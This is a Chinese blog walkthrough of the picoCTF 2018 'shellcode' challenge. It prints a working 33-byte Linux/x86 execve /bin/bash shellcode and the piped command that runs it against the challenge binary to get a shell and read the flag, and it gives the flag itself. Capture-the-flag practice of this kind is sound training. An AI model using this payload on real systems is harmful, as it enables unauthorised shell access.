小屋創作

日誌2020-05-29 00:41

PICO CTF 2018 shellcode

作者:OKHand

shellcode - Points: 200 - (Solves: 3299)
->我們先下載Source看看程式碼長整樣
->我們可以看到程式碼裡有一段((void (*)())buf)(); 他把shellcode當成函式來呼叫
->然後我們去看提示,提示說看看網路上有沒有好的shellcode可以拿來用
->在網路上找到http://shell-storm.org/shellcode/
->我們找 Linux/x86 - execve(/bin/bash, [/bin/sh, -p], NULL) - 33 bytes by Jonathan Salwan
->我們就可以用他的已知的shellcode
->所以們就先 cd /problems/shellcode_4_99838609970da2f5f6cf39d6d9ed57cd
->我們輸入python -c "print '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'" | ./vuln
->發現它直接跑完沒有做動作
->我們嘗試加個cat讓他停下來做動作
->(python -c "print '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'" ; cat)| ./vuln
->發現他停下來了沒有直接結束程式還停在shellcode裡
->我們就cat flag.txt 就可以拿到我們要的flag了
->Flag:picoCTF{shellc0de_w00h00_b766002c}

以上是以我的理解打出來的如果有不對請教教我感恩!!
Shellcode:遠程shellcode 藉由抓軟體漏洞獲得特定的shellcode,再經由C或Python撰寫遠端攻擊程式,進而取得對方電腦之root權限。
參考資料:https://medium.com/@ktecv2000/%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E4%BD%8D%E6%94%BB%E6%93%8A%E4%B9%8B%E4%BA%8C-buffer-overflow-b0a33d43ba1d
解題影片:https://www.youtube.com/watch?v=sEe-JorIAQM

1

0

LINE 分享

相關創作

PICO CTF 2018 Lying Out

PICO CTF 2018 absolutely relative

PICO CTF 2018 Ext Super Magic

留言

開啟 APP

face基於日前微軟官方表示 Internet Explorer 不再支援新的網路標準,可能無法使用新的應用程式來呈現網站內容,在瀏覽器支援度及網站安全性的雙重考量下,為了讓巴友們有更好的使用體驗,巴哈姆特即將於 2019年9月2日 停止支援 Internet Explorer 瀏覽器的頁面呈現和功能。
屆時建議您使用下述瀏覽器來瀏覽巴哈姆特:
。Google Chrome(推薦)
。Mozilla Firefox
。Microsoft Edge(Windows10以上的作業系統版本才可使用)

face我們了解您不想看到廣告的心情⋯ 若您願意支持巴哈姆特永續經營,請將 gamer.com.tw 加入廣告阻擋工具的白名單中,謝謝 !【教學】